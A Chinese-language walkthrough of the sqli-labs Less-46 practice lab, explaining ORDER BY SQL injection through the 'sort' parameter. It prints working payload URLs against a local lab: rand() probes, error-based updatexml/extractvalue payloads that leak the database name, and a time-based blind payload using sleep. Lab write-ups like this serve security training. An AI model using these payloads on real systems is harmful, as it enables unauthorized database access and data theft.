sqli-labs(less-46)order by 注入

我们打开sql-labs的第46关然后在输入框内输入?id=1时会发现页面没有任何的变化,此时我们用Visual Studio Code查看第46关的代码

此时我们发现sql语句是sql = "SELECT \* FROM users ORDER BY id"; ,所以现在我们需要了解一下order by语句的作用。

在SQL语句中,asc是指定列按升序排列,desc则 是指定列按降序排列。
select * from users order by 1 desc; 使用降序进行排列
select * from users order by 1 asc;使用升序进行排列

这时我们就知道了,sql语句只有order by后面的参数是我们可控的,所以我们可以输入?sort=1,在这里sort=1的意思就是以第一列数据也就是id进行排序。

sql 复制代码
http://127.0.0.1/sincer/Less-46/?sort=1
sql 复制代码
http://127.0.0.1/sincer/Less-46/?sort=2

此时我们输入?sort=2,就是以USERNAME进行排序。

输入?sort=3时,会以PASSWORD进行排序。

当我们输入?sort=4时会报错,因为没有第四列。

注入点测试

sql 复制代码
127.0.0.1/sincer/less-46/?sort=rand(true)
sql 复制代码
http://127.0.0.1/sincer/less-46/?sort=rand(false)

报错注入(获取表名)

sql 复制代码
http://127.0.0.1/sincer/less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)

或者

sql 复制代码
http://127.0.0.1/sincer/less-46/?sort=(extractvalue(1,concat(0x7e,(database()),0x7e)))--+

时间盲注

sql 复制代码
http://127.0.0.1/sincer/Less-46/?sort=1%20and%20if(substr(database(),1,1)=%27s%27,1,sleep(1))--+
相关推荐
会编程的林俊杰几秒前
MySQL中的锁有哪些
数据库·mysql
cts6182 分钟前
Milvus分布式数据库工作职责
数据库·分布式·milvus
周胡杰2 分钟前
鸿蒙加载预置数据库-关系型数据库-如何读取本地/预制数据库
数据库·华为·harmonyos·鸿蒙
布朗克1686 分钟前
java常见的jvm内存分析工具
java·jvm·数据库
胡八一13 分钟前
SQLite / LiteDB 单文件数据库为何“清空表后仍占几 GB”?——原理解析与空间回收实战
jvm·数据库·sqlite
2401_831501731 小时前
Linux之Zabbix分布式监控篇(二)
数据库·分布式·zabbix
秋林辉2 小时前
Jfinal+SQLite处理 sqlite数据库执行FIND_IN_SET报错
jvm·数据库·sqlite
巴里巴气6 小时前
MongoDB复杂查询 聚合框架
数据库·mongodb
scheduleTTe8 小时前
SQL增查
数据库·sql
浮生带你学Java9 小时前
2025Java面试题及答案整理( 2025年 7 月最新版,持续更新)
java·开发语言·数据库·面试·职场和发展